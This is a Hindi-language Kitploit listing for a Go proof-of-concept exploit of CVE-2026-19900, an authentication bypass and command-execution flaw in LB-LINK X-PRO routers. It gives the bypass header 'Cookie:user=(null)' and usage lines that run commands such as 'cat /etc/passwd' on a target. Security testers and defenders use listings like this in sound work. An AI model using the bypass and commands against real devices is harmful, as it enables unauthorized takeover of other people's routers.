Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2026-19900-PoC — प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट CVE-2026-19900 के लिए, जो LB-LINK X-PRO राउटर में एक प्रमाणीकरण बायपास और रिमोट कोड एक्ज़ीक्यूशन भेद्यता है, जो एक क्राफ्टेड नल यूज़र कुकी के माध्यम से कमांड एक्ज़ीक्यूशन की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/on3sk-0x1/cve-2026-19900-poc
IoT सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubon3sk-0x1/cve-2026-19900-poc

cve-2026-19900-PoC

प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट CVE-2026-19900 के लिए, जो LB-LINK X-PRO राउटर में एक प्रमाणीकरण बायपास और रिमोट कोड एक्ज़ीक्यूशन भेद्यता है, जो एक क्राफ्टेड नल यूज़र कुकी के माध्यम से कमांड एक्ज़ीक्यूशन की अनुमति देता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
5घं 11मि पहलेअभी तक समीक्षित नहीं

CVE-2026-19900 LB-LINK X-PRO प्रमाणीकरण बायपास और null उपयोगकर्ता के माध्यम से RCE

CVE-2026-19900 हार्डकोडेड क्रेडेंशियल और प्रमाणीकरण बायपास RCE null उपयोगकर्ता के माध्यम से।

हेडर के माध्यम से बायपास: Cookie:user=(null)

उपयोग

लक्ष्य होस्ट के साथ स्क्रिप्ट बनाएं और चलाएं:

root@kitploit:~
go build cve-2026-19900-PoC.go
./cve-2026-19900-PoC -t http://target:8080/ -c "id"

बिना बिल्ड के

root@kitploit:~
go run cve-2026-19900-PoC.go -t http://target:8080/ -c "cat /etc/passwd"

इंटरैक्टिव मोड

root@kitploit:~
./cve-2026-19900-PoC -t http://target:8080/ -i

तर्क

  • -t: लक्ष्य IP पता या होस्टनाम (आवश्यक)
  • -c: cmd पेलोड भेजें
  • -i: इंटरैक्टिव मोड (-c <cmd> की आवश्यकता नहीं है)

Nuclei टेम्पलेट: (0x_Akoko द्वारा टेम्पलेट)

https://cloud.projectdiscovery.io/library/CVE-2026-19900

संदर्भ

https://github.com/glkfc/IoT-Vulnerability/blob/main/LB-LINK/LB-LINK_cmd%20Indicates%20the%20unauthorized%20command%20injection/The%20LB-LINK_cmd%20command%20is%20used%20to%20inject%20information.md https://nvd.nist.gov/vuln/detail/CVE-2026-19900 https://github.com/DavCloudz/cve/blob/main/B-Link/B-Link%20AC1200%20X-PRO(AC6)%20Hardcoded%20Credentials%20Vulnerability.md https://vuldb.com/cve/CVE-2026-19900 https://vuldb.com/submit/870712

टूल डाउनलोड करें